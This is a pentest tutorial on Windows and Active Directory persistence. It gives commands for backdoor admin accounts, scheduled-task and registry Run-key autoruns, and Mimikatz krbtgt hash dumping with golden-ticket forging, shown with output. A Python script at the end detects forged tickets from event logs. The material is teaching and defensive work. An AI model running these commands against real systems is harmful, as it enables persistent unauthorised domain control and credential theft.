Persistence
When a computer or even the entire domain is compromised, how do you keep it that way? (note: not normally required in a pentest)
Local Computer
With administrative privileges on a computer, you can do anything. If we want to keep control of this computer, even after someone's password changes, for example, we can create some "backdoors".
One simple way is to create a new local account on the computer and add it to the BUILTIN\Administrators group:
net user $USERNAME $PASSWORD /add
net localgroup Administrators $USERNAME /add
This later allows you to log in as that user and dump cached creds like Local Privilege Escalation #Post-Exploitation: Mimikatz
Another method is creating a scheduled task that executes hourly (or at some other interval) and runs a program that gives you a reverse shell, for example.
# Run every 1 hour
schtasks /create /sc HOURLY /mo 1 /tn "Cleanup" /tr "C:\Windows\Tasks\backdoor.exe"
# Run on startup, as the SYSTEM user
schtasks /create /sc ONSTART /tn "Cleanup" /ru "SYSTEM" /tr "C:\Windows\Tasks\backdoor.exe"
Another classic is Autoruns: programs that register themselves to run at startup. You can place binaries or scripts in the following shell:startup directory, and they will execute on startup:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
The Windows Registry is also a great sea of abusable keys that automatically run programs. The Software\Microsoft\Windows\CurrentVersion\Run path under HKCU and HKLM contains a value for every program that should run at startup, for only the current user or for all users respectively:
# Run for the current user
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Cleanup" /t REG_SZ /d "C:\Windows\Tasks\backdoor.exe" /f
# Run for all users
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cleanup" /t REG_SZ /d "C:\Windows\Tasks\backdoor.exe" /f
Active Directory
When an entire Active Directory is compromised, a lot of integrity is lost. Any secret can be read out and later used to log in as any user, even after your access has been revoked. Here are some well-known attacks that real threat actors use to persist after a breach if not all of the required secrets are rotated.
Golden Ticket
We've seen Lateral Movement #Forge (Silver) Tickets, where we have the NTLM hash of a service (SPN) account and can forge a Kerberos service ticket as any user for that service. Taking this one step further is possible when we compromise the NTLM hash of the krbtgt user. Because TGTs are encrypted with this secret, we can forge any ticket in the future if we know it.
On the Domain Controller, we will ask the LSA server for all known credentials using Mimikatz:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # lsadump::lsa /patch
Domain : $DOMAIN / S-1-5-21-5386719015-7638691639-2457330780
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 8a772f3282654f2f9e165e19926a32a4
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 752da57f6d5047d6a251359025bd97e1
...
This finds the NTLM hash of the krbtgt user, which can now be used to forge any ticket. Even after the vulnerabilities that led to the breach have been patched, the attacker can still get a new valid session with it.
We provide the domain and its SID (found using whoami /user, by dropping the trailing RID from our own SID), then choose a user with a lot of privileges like a Domain Admin, and give the krbtgt NTLM hash:
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
mimikatz # kerberos::golden /ptt /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /user:jen /krbtgt:752da57f6d5047d6a251359025bd97e1
User : jen
Domain : corp.com (CORP)
SID : S-1-5-21-1987370270-658905905-1781884369
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 1693c6cefafffc7af11ef34d1c788f47 - rc4_hmac_nt
Lifetime : 9/16/2022 2:15:57 AM ; 9/13/2032 2:15:57 AM ; 9/13/2032 2:15:57 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'jen @ corp.com' successfully submitted for current session
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF665F1B800
This injects it into our current session, and the newly spawned cmd.exe will allow you to do anything on the domain through Kerberos, like Lateral Movement with a hostname instead of an IP to get a shell.
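A detection idea for the forged TGT above, as an added example that is not part of the original notes: a golden ticket is built offline, so the Domain Controller never logs a 4768 (TGT requested) event for it, yet 4769 (service ticket requested) events follow as soon as it is used. The Python check below runs over constructed sample events and flags every 4769 whose user/host pair has no 4768 within the domain's maximum TGT lifetime; the field names and sample data are assumptions, and the mitigation remains rotating the krbtgt password twice.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs): a minimal subset of the fields from
# Windows Security events 4768 (TGT requested) and 4769 (service ticket requested).
SAMPLE_EVENTS = [
    {"time": "2022-09-16T02:10:00", "id": 4768, "user": "alice", "ip": "10.0.0.5", "service": "krbtgt"},
    {"time": "2022-09-16T02:11:00", "id": 4769, "user": "alice", "ip": "10.0.0.5", "service": "cifs/FILES01"},
    # 'jen' never asked the DC for a TGT from this host, yet requests service tickets:
    {"time": "2022-09-16T02:16:00", "id": 4769, "user": "jen", "ip": "10.0.0.77", "service": "cifs/DC01"},
    {"time": "2022-09-16T02:17:00", "id": 4769, "user": "jen", "ip": "10.0.0.77", "service": "ldap/DC01"},
]


def find_tgs_without_tgt(events, window_hours=10.0):
    """Return the 4769 events whose (user, ip) pair has no 4768 in the preceding window.

    A forged TGT is never requested from the DC, so the service-ticket requests
    that follow have no matching AS-REQ. window_hours should equal the domain's
    maximum TGT lifetime (default policy: 10 hours); a legitimate TGT older than
    that would have been renewed or re-requested, producing a fresh 4768.
    Events from every DC in the domain must be merged before running this check,
    otherwise a TGT issued by another DC looks forged.
    """
    window = timedelta(hours=window_hours)
    last_tgt = {}  # (user, ip) -> time of the most recent 4768
    suspicious = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        key = (ev["user"].lower(), ev["ip"])
        if ev["id"] == 4768:
            last_tgt[key] = t
        elif ev["id"] == 4769:
            seen = last_tgt.get(key)
            if seen is None or t - seen > window:
                suspicious.append(ev)
    return suspicious


if __name__ == "__main__":
    for ev in find_tgs_without_tgt(SAMPLE_EVENTS):
        print(f"{ev['time']} {ev['user']}@{ev['ip']} -> {ev['service']}: "
              "service ticket requested without a prior TGT request")
```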